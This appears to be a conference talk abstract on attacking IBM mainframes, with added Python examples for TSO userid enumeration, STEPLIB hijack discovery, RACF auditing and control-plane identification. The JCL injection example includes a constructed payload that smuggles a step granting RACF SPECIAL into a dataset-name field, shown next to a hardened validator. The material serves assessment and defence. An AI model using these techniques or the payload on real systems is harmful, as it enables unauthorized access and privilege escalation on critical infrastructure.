2026-06-04, Track 1
Before the web. Before TCP/IP. Before "cloud." Some of the most powerful computers in the world were already running production workloads.
IBM mainframes didn't grow up in the browser era. System/360 (1964), MVS (1974), and today's z/OS (2000) were built for batch jobs, green-screen terminals, and a world where the internet simply didn't exist. Yet these systems still quietly process the majority of global financial transactions, airline bookings, and government records.
This talk is a guided tour of what happens when modern red teamers bring cloud-era assumptions into a system that predates the web. We'll break down how mainframes actually organize authority across five control planes (VTAM, TSO, RACF, JES, and CICS) and show exactly where those assumptions break. No shell model. No process tree. No EDR. The attack surface looks nothing like what your tooling expects.
We'll walk real techniques: TN3270 user enumeration, STEPLIB hijacking as a supply chain analog, JCL injection for deferred privileged execution, RACF misconfiguration paths, and how Network Job Entry (NJE) misconfigurations can enable remote job submission without meaningful authentication, the mainframe equivalent of an open relay. These aren't theoretical. They come from real assessments against production environments.
We'll also introduce BigIron.ai, an open-source, fully offline AI-assisted assessment platform for z/OS and MVS environments. It runs a local LLM against live TN3270 sessions, interprets control-plane context in real time, guides structured walkthroughs, and generates findings. No cloud, no API keys, no data leaves the machine. We'll demo it live.
No mainframe background required. Just clear mental models, real terminal output, and a framework you can use the next time a mainframe shows up in scope.
Think of it as critical infrastructure security for a system your threat model forgot.
Mainframes are not legacy systems in the way the industry uses that word. They are actively maintained, actively targeted, and actively misunderstood. The security gap exists not because the systems are old but because the mental models used to assess them are wrong. This talk addresses that gap directly.
The Technical Problem
Modern offensive security methodology is built around a set of assumptions that do not hold on z/OS: that privilege is binary and anchored to a user account, that lateral movement happens through network services, that execution is interactive and session-bound, and that a process tree or endpoint agent will surface attacker behavior. None of these are true on a mainframe.
z/OS organizes authority across five subsystems, each with a distinct security boundary. VTAM controls session establishment and terminal binding. TSO binds interactive identity and provides the context under which all commands, dataset access, and job submissions are authorized. RACF enforces access continuously, per resource, before execution. JES queues and schedules deferred work and hands it to an initiator, which runs it later under the identity of the submitter (or the identity named on the JOB card, where a SURROGAT permission allows that), outside any interactive session. CICS controls transaction execution and enforces authorization at the transaction level, not the program level.
An attacker who understands these boundaries can move through them without triggering any of the detection mechanisms a modern SOC relies on. An attacker who does not understand them will misread what they see, take actions with unintended consequences, and likely miss the actual exposure entirely.
The Techniques
The talk covers four concrete attack paths, each demonstrated against a live MVS 3.8j environment running on Hercules:
TN3270 user enumeration exploits differential response behavior at the TSO logon screen reached through VTAM. A valid userid produces a password prompt (IKJ56700A). An invalid userid produces an immediate rejection (IKJ56420I, "USERID ... NOT AUTHORIZED TO USE TSO"). The behavior is the same on MVS 3.8j and current z/OS, requires no authentication, and sends no password, so probing does not push valid accounts toward RACF's revoke threshold. It is the standard first step in any mainframe assessment and is already automated by the Nmap scripting engine's tso-enum script.
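The enumeration logic above, as an added example that is not code from the talk or from BigIron.ai. The TN3270 transport is abstracted behind a probe callable so the block runs offline; the screens are constructed samples, and the exact message texts (IKJ56700A for the password prompt, IKJ56420I for an unknown userid) are assumptions to confirm against the target.

```python
"""TSO userid enumeration by differential logon response.

Added example for this page; not code from the talk or from BigIron.ai.
The TN3270 transport is abstracted behind a probe callable so the logic
runs offline. The screens below are constructed samples modelled on the
messages nmap's tso-enum.nse keys on: IKJ56420I for an unknown userid and
IKJ56700A for the password prompt. Treat the exact message text as an
assumption and confirm it against the target before trusting the results.
"""
from enum import Enum
from typing import Callable, Dict, Iterable

# Userid characters TSO/RACF accept; classic TSO limits the length to 7.
USERID_CHARS = set("ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@#$")


class Result(Enum):
    VALID = "valid"        # TSO asked for a password: the userid exists
    INVALID = "invalid"    # TSO rejected the userid outright
    REVOKED = "revoked"    # userid exists but is revoked (still enumerable)
    UNKNOWN = "unknown"    # screen matched nothing: record it, do not guess


def classify_logon_screen(screen: str) -> Result:
    """Map one post-LOGON screen to an enumeration result."""
    text = screen.upper()
    if "IKJ56420I" in text or "NOT AUTHORIZED TO USE TSO" in text:
        return Result.INVALID
    if "REVOKED" in text:
        return Result.REVOKED
    if "IKJ56700A" in text or "ENTER PASSWORD" in text:
        return Result.VALID
    return Result.UNKNOWN


def enumerate_userids(candidates: Iterable[str],
                      probe: Callable[[str], str]) -> Dict[str, Result]:
    """Probe each candidate once. Only the userid is sent, never a password,
    so valid accounts are not pushed toward RACF's revoke threshold."""
    results: Dict[str, Result] = {}
    for candidate in candidates:
        userid = candidate.strip().upper()
        if not 1 <= len(userid) <= 8 or set(userid) - USERID_CHARS:
            continue  # TSO would reject it before any lookup happened
        results[userid] = classify_logon_screen(probe(userid))
    return results


# Constructed sample screens standing in for a live TN3270 session.
SAMPLE_SCREENS = {
    "IBMUSER": "IKJ56700A ENTER PASSWORD -\n",
    "HERC01": "IKJ56700A ENTER PASSWORD -\n",
    "HERC02": "LOGON REJECTED, USERID HERC02 REVOKED\n",
}


def fake_probe(userid: str) -> str:
    """Stand-in for 'send LOGON <userid> over TN3270 and read the screen'."""
    return SAMPLE_SCREENS.get(
        userid, f"IKJ56420I USERID {userid} NOT AUTHORIZED TO USE TSO\n")


if __name__ == "__main__":
    hits = enumerate_userids(["ibmuser", "oper1", "herc02", "waytoolong"],
                             fake_probe)
    for uid, res in hits.items():
        print(f"{uid:<8} {res.value}")
```

To run it against a real system, replace fake_probe with a function that drives a TN3270 session (for example through x3270 or a TN3270 library), sends LOGON followed by the userid, and returns the next screen as text; keep UNKNOWN as a distinct outcome so a changed message text shows up as a gap in coverage rather than a false negative.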
STEPLIB hijacking exploits the mainframe program library search order. When a job step names a STEPLIB DD (or the job names a JOBLIB DD), MVS searches that concatenation, in order, before the link pack area and the LNKLST system libraries. If an attacker has UPDATE access to any dataset that appears in the STEPLIB concatenation of a higher-privileged job, they can place a load module there and have it execute under the job's RACF identity. No vulnerability is exploited. RACF does not prevent it, because the UPDATE grant is itself the authorization. No alert fires by default. SMF records the library update and the step that ran the module, but nobody is watching. One caveat worth knowing on both sides: the planted module runs with APF authorization only if every library in the concatenation is APF-authorized, so the RACF identity is the reliable prize, and APF is a bonus that depends on the concatenation. This is a direct analog to DLL hijacking or LD_PRELOAD injection and represents a supply chain attack against the batch execution environment.
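The concatenation analysis above, as an added example that is not code from the talk or from BigIron.ai. It parses a job's JOBLIB and STEPLIB DD statements, applies the STEPLIB-overrides-JOBLIB rule, and reports each library the assessor can write to together with what a module planted there can shadow. The sample job and the writable-dataset set are constructed; in practice the set comes from RACF (effective UPDATE or higher).

```python
"""Find STEPLIB/JOBLIB hijack points in a batch job.

Added example for this page, not code from the talk or from BigIron.ai.
It parses a job's JOBLIB and STEPLIB concatenations, applies the rule
that STEPLIB overrides JOBLIB for its step and that a concatenation is
searched in order, then reports every library the assessor can write to.
The job below and the writable-dataset set are constructed; in a real
assessment the set comes from RACF (effective UPDATE or higher access).
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

DSN_RE = re.compile(r"\bDSN(?:AME)?=([A-Z0-9@#$.\-]+)")
PGM_RE = re.compile(r"\bPGM=([A-Z0-9@#$]+)")
USER_RE = re.compile(r"\bUSER=([A-Z0-9@#$]+)")


@dataclass
class StepLibs:
    step: str
    program: str
    source: str           # "STEPLIB", "JOBLIB" or "none"
    libraries: List[str]  # task-library concatenation in search order


def _fields(line: str) -> Tuple[str, str, str]:
    """Split a JCL statement into name, operation and parameter fields.
    A blank column 3 means the name field is omitted (a concatenated DD)."""
    body = line[2:]
    if body and not body[0].isspace():
        name, op, params = (body.split(None, 2) + ["", ""])[:3]
        return name, op, params
    op, params = (body.split(None, 1) + ["", ""])[:2]
    return "", op, params


def parse_job(jcl: str) -> Tuple[Optional[str], List[StepLibs]]:
    joblib: List[str] = []
    steps: List[StepLibs] = []
    current: Optional[StepLibs] = None
    open_dd: Optional[str] = None
    job_user: Optional[str] = None
    for line in jcl.splitlines():
        if not line.startswith("//") or line.startswith("//*"):
            continue                       # not JCL, or a comment card
        name, op, params = _fields(line)
        if op == "JOB":
            m = USER_RE.search(params)     # USER= means the job runs as someone else
            job_user = m.group(1) if m else None
        elif op == "EXEC":
            m = PGM_RE.search(params)
            current = StepLibs(name, m.group(1) if m else "?", "none", [])
            steps.append(current)
            open_dd = None
        elif op == "DD":
            if name:
                open_dd = name             # a blank name continues this DD
            m = DSN_RE.search(params)
            if not m:
                continue
            if open_dd == "JOBLIB" and current is None:
                joblib.append(m.group(1))
            elif open_dd == "STEPLIB" and current is not None:
                current.libraries.append(m.group(1))
                current.source = "STEPLIB"
    for step in steps:                     # STEPLIB overrides JOBLIB for its step
        if not step.libraries and joblib:
            step.libraries, step.source = list(joblib), "JOBLIB"
    return job_user, steps


def find_hijack_points(jcl: str, writable: Set[str]) -> List[Dict[str, object]]:
    """Libraries the assessor can update, with what each one can shadow.
    A module planted at position n is used whenever no library at positions
    1..n-1 contains a module of that name (JPA and TASKLIB are not modelled)."""
    job_user, steps = parse_job(jcl)
    findings: List[Dict[str, object]] = []
    for step in steps:
        for pos, lib in enumerate(step.libraries, 1):
            if lib in writable:
                findings.append({
                    "step": step.step, "program": step.program,
                    "runs_as": job_user or "submitter", "source": step.source,
                    "library": lib, "position": pos,
                    "searched_first": step.libraries[:pos - 1],
                })
    return findings


# Constructed sample: a privileged nightly job with a mixed STEPLIB.
SAMPLE_JOB = """\
//PAYROLL  JOB (ACCT),'NIGHTLY',CLASS=A,USER=PAYADM
//JOBLIB   DD  DSN=PROD.PAYROLL.LOADLIB,DISP=SHR
//STEP1    EXEC PGM=PAYCALC
//STEP2    EXEC PGM=PAYRPT
//STEPLIB  DD  DSN=PROD.BATCH.LOADLIB,DISP=SHR
//         DD  DSN=DEV.UTIL.LOADLIB,DISP=SHR
//         DD  DSN=SYS1.LINKLIB,DISP=SHR
//SYSPRINT DD  SYSOUT=*
"""
WRITABLE = {"DEV.UTIL.LOADLIB"}   # assumption: the assessor holds UPDATE here

if __name__ == "__main__":
    for finding in find_hijack_points(SAMPLE_JOB, WRITABLE):
        print(finding)
```

On the sample, STEP1 resolves through JOBLIB only and is clean, while STEP2's STEPLIB puts a development library in second position: any module name PAYRPT loads that is not already in PROD.BATCH.LOADLIB resolves to whatever the assessor placed in DEV.UTIL.LOADLIB, under PAYADM. Whether the step also runs APF-authorized depends on every library in that concatenation being APF-authorized, which the block does not check.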
JCL injection for deferred privileged execution covers the case where an attacker can influence the JCL stream of a job that runs under a more privileged identity. Because JES runs the job later under the submitter's RACF identity (or the identity named on the JOB card, where SURROGAT permits it), and because that identity is bound to the job rather than to the terminal session, an attacker can submit work, log off, and have privileged code execute minutes or hours later with no active session to detect. What remains is the job's SMF records and its spool output, neither of which a session-based detection model looks at. This breaks every assumption about session-based detection.
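A worked instance of the injection above, as an added example that is not code from the talk. A job-submission helper builds JCL from a template and a caller-supplied dataset name; the vulnerable version interpolates the name verbatim, so a newline lets the caller append statements that JES will run under the submitting identity, and the hardened version accepts only a well-formed MVS dataset name and checks the card-column limit. The template, the payload, and the program and command names in it (IKJEFT01, ALTUSER) are illustrative.

```python
"""JCL injection through an unvalidated dataset name.

Added example for this page, not code from the talk. A job-submission
helper builds JCL from a template and a caller-supplied dataset name; the
vulnerable version interpolates the name as-is, so a newline lets the
caller append statements that JES will run under the submitting identity.
The hardened version accepts only a syntactically valid MVS dataset name
and checks the card-column limit. Program and command names in the
injected payload (IKJEFT01, ALTUSER) are illustrative.
"""
import re

JOB_TEMPLATE = """\
//COPYJOB  JOB (ACCT),'COPY',CLASS=A,MSGCLASS=X
//STEP1    EXEC PGM=IEBGENER
//SYSPRINT DD SYSOUT=*
//SYSIN    DD DUMMY
//SYSUT1   DD DSN={dsn},DISP=SHR
//SYSUT2   DD SYSOUT=*
"""


def build_job_vulnerable(dsn: str) -> str:
    """Trusts the caller: anything in dsn lands in the JCL stream verbatim."""
    return JOB_TEMPLATE.format(dsn=dsn)


# MVS dataset name: 1-8 char qualifiers, first char alphabetic or national
# (@ # $), joined by periods, at most 44 chars, optional (MEMBER) for a PDS.
QUALIFIER = r"[A-Z@#$][A-Z0-9@#$\-]{0,7}"
DSN_RE = re.compile(
    rf"{QUALIFIER}(?:\.{QUALIFIER})*(?:\([A-Z@#$][A-Z0-9@#$]{{0,7}}\))?")


def validate_dsn(dsn: str) -> str:
    """Return dsn unchanged if it is a well-formed name, else raise."""
    if not DSN_RE.fullmatch(dsn):
        raise ValueError(f"not a valid dataset name: {dsn!r}")
    if len(dsn.split("(")[0]) > 44:
        raise ValueError("dataset name exceeds 44 characters")
    return dsn


def build_job_hardened(dsn: str) -> str:
    """Validate the name, then confirm no card runs past column 71
    (columns 73-80 are ignored by the reader, so an over-long operand
    would be silently truncated rather than rejected)."""
    job = JOB_TEMPLATE.format(dsn=validate_dsn(dsn))
    for card in job.splitlines():
        if len(card) > 71:
            raise ValueError(f"JCL card exceeds column 71: {card!r}")
    return job


def count_statements(jcl: str) -> int:
    """Number of JCL statements (cards starting with //, excluding comments)."""
    return sum(1 for card in jcl.splitlines()
               if card.startswith("//") and not card.startswith("//*"))


# Constructed payload: closes the DD statement, adds a TSO batch step that
# issues a RACF command, then re-opens a DD so the template's tail still parses.
INJECTED_DSN = (
    "USER.DATA\n"
    "//STEP2    EXEC PGM=IKJEFT01\n"
    "//SYSTSIN  DD *\n"
    "  ALTUSER ATTACKER SPECIAL\n"
    "/*\n"
    "//SYSUT1X  DD DSN=USER.DATA"
)

if __name__ == "__main__":
    print(build_job_vulnerable(INJECTED_DSN))
    try:
        build_job_hardened(INJECTED_DSN)
    except ValueError as exc:
        print("rejected:", exc)
```

The injected step only matters because of who submits the job: the ALTUSER command succeeds or fails on the submitting identity's RACF authority, not the attacker's, and it runs whenever an initiator picks the job up, long after the attacker's session is gone.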
RACF misconfiguration paths cover the most common findings in real assessments: overbroad dataset profiles using high-level qualifier wildcards, excessive group authority granted through organic entitlement growth, SURROGAT class entries that allow job submission under another user's identity, and APF library dataset permissions that allow non-privileged users to introduce authorized code. Each of these is a configuration failure, not a vulnerability. RACF will write the corresponding SMF records when the access happens, but nothing turns those records into an alert by default, and a write to an APF library looks exactly like any other successful UPDATE.
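Two of the checks above, as an added example that is not code from the talk or from BigIron.ai. It models RACF generic-profile matching with enhanced generic naming (% one character, * part of one qualifier or exactly one qualifier, ** zero or more qualifiers), picks the most specific matching profile by comparing wildcard ranks left to right, resolves a user's effective access (user entry, then group entries, then UACC), and flags HLQ-wide generics with UACC of UPDATE or higher and APF libraries an unprivileged user can write to. The profiles and APF list are constructed, the specificity rule is an approximation of RACF's, and unprotected datasets are assumed to deny access.

```python
"""RACF DATASET profile matching and two misconfiguration checks.

Added example for this page, not code from the talk or from BigIron.ai.
It models RACF generic-profile matching with enhanced generic naming
(% = one character, * = part of one qualifier or exactly one qualifier,
** = zero or more qualifiers), picks the most specific matching profile by
comparing wildcard ranks left to right, and resolves a user's effective
access (user entry, then group entries, then UACC). Both the profiles and
the APF list are constructed; the specificity rule is an approximation of
RACF's and the example assumes default-deny for unprotected datasets.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

LEVELS = ["NONE", "EXECUTE", "READ", "UPDATE", "CONTROL", "ALTER"]


@dataclass
class Profile:
    name: str
    generic: bool
    uacc: str
    acl: Dict[str, str] = field(default_factory=dict)  # userid/group -> access


def profile_regex(name: str) -> re.Pattern:
    parts = []
    for i, q in enumerate(name.split(".")):
        sep = r"\." if i else ""
        if q == "**":       # zero or more qualifiers, absorbing its own dot
            parts.append(r"(?:\.[^.]+)*" if i else r"(?:[^.]+(?:\.[^.]+)*)?")
        elif q == "*":      # exactly one qualifier
            parts.append(sep + r"[^.]+")
        else:               # literal text with % and in-qualifier *
            parts.append(sep + "".join(
                "[^.]" if c == "%" else "[^.]*" if c == "*" else re.escape(c)
                for c in q))
    return re.compile("".join(parts))


def _specificity(name: str) -> List[int]:
    """Lower is more specific: literal 0, % 1, * 2, ** 3, compared left to right."""
    key: List[int] = []
    i = 0
    while i < len(name):
        if name.startswith("**", i):
            key.append(3)
            i += 2
        else:
            key.append({"%": 1, "*": 2}.get(name[i], 0))
            i += 1
    return key


def best_profile(dsn: str, profiles: List[Profile]) -> Optional[Profile]:
    matches = [p for p in profiles
               if (profile_regex(p.name).fullmatch(dsn) if p.generic
                   else dsn == p.name)]
    return min(matches, key=lambda p: _specificity(p.name), default=None)


def effective_access(dsn: str, user: str, groups: Set[str],
                     profiles: List[Profile]) -> str:
    p = best_profile(dsn, profiles)
    if p is None:
        return "NONE"                      # assumption: PROTECTALL-style default deny
    if user in p.acl:
        return p.acl[user]                 # a user entry overrides group entries
    via_groups = [p.acl[g] for g in groups if g in p.acl]
    if via_groups:
        return max(via_groups, key=LEVELS.index)
    return p.uacc


def audit(profiles: List[Profile], apf_libraries: Set[str],
          user: str, groups: Set[str]) -> List[str]:
    """Flag HLQ-wide generics with UACC of UPDATE or higher, and APF
    libraries the given (unprivileged) user can write to."""
    findings: List[str] = []
    update = LEVELS.index("UPDATE")
    for p in profiles:
        quals = p.name.split(".")
        if (p.generic and len(quals) == 2 and quals[1] in ("*", "**")
                and LEVELS.index(p.uacc) >= update):
            findings.append(f"OVERBROAD: {p.name} UACC({p.uacc}) covers a whole HLQ")
    for lib in sorted(apf_libraries):
        acc = effective_access(lib, user, groups, profiles)
        if LEVELS.index(acc) >= update:
            findings.append(f"APF: {user} has {acc} on APF library {lib}")
    return findings


# Constructed sample profiles and APF list.
PROFILES = [
    Profile("SYS1.**", True, "READ", {"SYSPROG": "ALTER"}),
    Profile("SYS1.LINKLIB", False, "READ", {"SYSPROG": "ALTER"}),
    Profile("PROD.**", True, "UPDATE"),               # the overbroad one
    Profile("PAYROLL.**", True, "NONE", {"PAYADM": "UPDATE"}),
]
APF_LIBRARIES = {"SYS1.LINKLIB", "PROD.APF.LOADLIB"}

if __name__ == "__main__":
    for line in audit(PROFILES, APF_LIBRARIES, "BATCHUSR", {"DEVS"}):
        print(line)
```

The two findings on the sample are the same root cause seen from two sides: PROD.** with UACC(UPDATE) is the overbroad profile, and PROD.APF.LOADLIB being writable by BATCHUSR is the consequence that matters, because a load module added there runs authorized. SYS1.LINKLIB stays clean only because its discrete profile outranks SYS1.** and keeps UACC at READ.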
The Tool
BigIron.ai is an open-source, fully offline AI-assisted assessment platform built specifically for z/OS and MVS environments. It is not a scanner. It is a reasoning layer that sits between the assessor and the TN3270 terminal.
The platform runs a local language model via Ollama against live TN3270 session output. When the assessor captures a screen, the LLM identifies the active control plane, interprets the identity context, flags assumptions that may be wrong, and provides guidance on what to do next. It does not connect to any external service. No screen content, no credentials, no assessment data leaves the machine.
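A deterministic stand-in for the control-plane identification step described above and in The Technical Problem, as an added example that is not code from the talk or from BigIron.ai (which uses a local LLM for this). It keys on message-id prefixes (IST for VTAM, IKJ for TSO, ICH for RACF, IEF and $HASP for JES, DFH for CICS) plus a few screen-text hints, and pulls the greeted userid and any submitted job out of the screen. The sample screens are constructed, and the exact message texts are assumptions that vary by release.

```python
"""Identify the active control plane from a captured 3270 screen.

Added example for this page, not code from the talk or from BigIron.ai,
which does this step with a local LLM. This is a deterministic stand-in
built on message-id prefixes (IST = VTAM, IKJ = TSO, ICH = RACF, IEF and
$HASP = JES, DFH = CICS) plus a few screen-text hints. The sample screens
are constructed; exact message texts vary by release and are assumptions.
"""
import re
from typing import Dict, List, Tuple

MSGID_RE = re.compile(
    r"(?m)^\s*(\$HASP\d{3}|DFH[A-Z]{2}\d{4}|[A-Z]{3}\d{3,5}[A-Z]?)\b")
PREFIXES = [("$HASP", "JES"), ("IAT", "JES"), ("IEF", "JES"),
            ("IST", "VTAM"), ("IKJ", "TSO"), ("ICH", "RACF"), ("DFH", "CICS")]
HINTS = [(r"^\s*READY\s*$", "TSO"), (r"\bISPF\b", "TSO"),
         (r"LOGON APPLID", "VTAM"), (r"USSMSG", "VTAM"),
         (r"SIGN[ -]?ON TO CICS", "CICS"), (r"\bINTRDR\b", "JES")]


def identify_control_plane(screen: str) -> Tuple[str, List[str]]:
    """Return (plane, evidence). RACF messages are counted as evidence, but
    RACF is an enforcement layer: ICH messages inside a TSO session mean
    'RACF is checking you', not 'you are talking to RACF'."""
    votes: Dict[str, List[str]] = {}
    for msgid in MSGID_RE.findall(screen):
        for prefix, plane in PREFIXES:
            if msgid.startswith(prefix):
                votes.setdefault(plane, []).append(msgid)
                break
    for pattern, plane in HINTS:
        if re.search(pattern, screen, re.M | re.I):
            votes.setdefault(plane, []).append(pattern)
    if not votes:
        return "UNKNOWN", []
    plane = max(votes, key=lambda p: len(votes[p]))
    return plane, votes[plane]


def identity_context(screen: str) -> Dict[str, str]:
    """Pull identity facts out of the screen: the userid RACF greeted
    (ICH70001I) and any job the session submitted (JOB name(JOBnnnnn))."""
    ctx: Dict[str, str] = {}
    m = re.search(r"ICH70001I\s+([A-Z0-9@#$]{1,8})\s+LAST ACCESS", screen)
    if m:
        ctx["userid"] = m.group(1)
    m = re.search(r"JOB\s+([A-Z0-9@#$]{1,8})\((JOB\d{5})\)\s+SUBMITTED", screen)
    if m:
        ctx["job"], ctx["jobid"] = m.group(1), m.group(2)
    return ctx


# Constructed screens standing in for live TN3270 captures.
VTAM_SCREEN = "*** WELCOME TO MVS ***\nLOGON APPLID(TSO)\n"
TSO_SCREEN = ("ICH70001I IBMUSER  LAST ACCESS AT 09:12:01 ON MONDAY\n"
              "IKJ56455I IBMUSER LOGON IN PROGRESS AT 09:13:00\n"
              "READY\n"
              "JOB PAYROLL(JOB00123) SUBMITTED\n")
JES_SCREEN = ("$HASP100 PAYROLL  ON INTRDR\n"
              "$HASP373 PAYROLL  STARTED - INIT  1 - CLASS A\n"
              "IEF403I PAYROLL - STARTED\n")
CICS_SCREEN = "DFHCE3520 Please type your userid.\n"

if __name__ == "__main__":
    for s in (VTAM_SCREEN, TSO_SCREEN, JES_SCREEN, CICS_SCREEN):
        print(identify_control_plane(s), identity_context(s))
```

The design point is the one the talk makes about identity: the TSO screen carries a RACF message and a JES job number, but the assessor is in TSO, and the job that was just submitted will run later without that session. A classifier, statistical or not, has to keep "which plane am I in" separate from "which planes have touched this screen".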
Beyond the AI layer, the platform includes thirteen scripted autonomous walkthroughs across all five control planes, a findings engine that maps results to a repeatable F1 through F5 assessment framework, a TN3270 network scanner for mainframe discovery, a RAG knowledge base ingesting IBM Redbooks and ABEND reference material, and a red team tutor with structured labs and engagement checklists.
The demo environment runs MVS 3.8j Turnkey on Hercules. This is appropriate for demonstrating control-plane mechanics, VTAM session behavior, TSO identity binding, JES submission and spool, and dataset access patterns. One difference is structural: the Turnkey distributions ship RAKF, a RACF-like security manager, rather than RACF itself, so RACF profile and class semantics are approximated rather than reproduced. Where z/OS behavior differs meaningfully, those differences are noted explicitly.
The Audience
The talk is designed for offensive security practitioners who have encountered mainframes in scope and had no framework for assessing them, defensive practitioners who are responsible for mainframe environments but have no visibility into what an attacker would actually do, and security engineers building detection or assessment programs who need an accurate model of how the system works before they can reason about what to monitor.
No mainframe background is assumed. The talk builds the required mental model from first principles, using analogies to concepts the audience already knows, then applies that model to concrete attack paths and a live tool demonstration.
What Attendees Leave With
A correct mental model of mainframe authority and execution that replaces the cloud and Linux assumptions most practitioners carry in. A repeatable assessment methodology structured around control planes rather than hosts and services. Familiarity with four concrete attack techniques that have been observed in production assessments. Access to an open-source tool they can run immediately against any MVS or z/OS environment.
Adam Toscher is a New York–based security engineer and red team operator with over two decades of experience in offensive security, adversary simulation, and automation. Born in New York City and raised upstate, Adam built his career as an "IT vagabond," beginning as a freshman IBM intern porting Linux applications to mainframe systems. Mainframe work grounded him in large-scale computing, operating systems, and complex enterprise environments before he transitioned into offensive security. He later progressed through senior security roles at Adobe, Optiv, Accenture, IBM X-Force, and NYC Cyber Command, where he focused on realistic adversary emulation and advanced red-team operations. Most recently, Adam has been working with Cobalt Labs, supporting advanced red-teaming and offensive security engagements for private-sector organizations. Prior to this, he led red-team and adversary simulation efforts in support of critical public infrastructure with NYC Cyber Command and the FDNY. His work centers on penetration testing, red teaming, adversary emulation, and practical automation across both private-sector companies and government agencies. Outside of security, Adam values balance and lifelong learning, and is an avid reader, runner, swimmer, and gamer.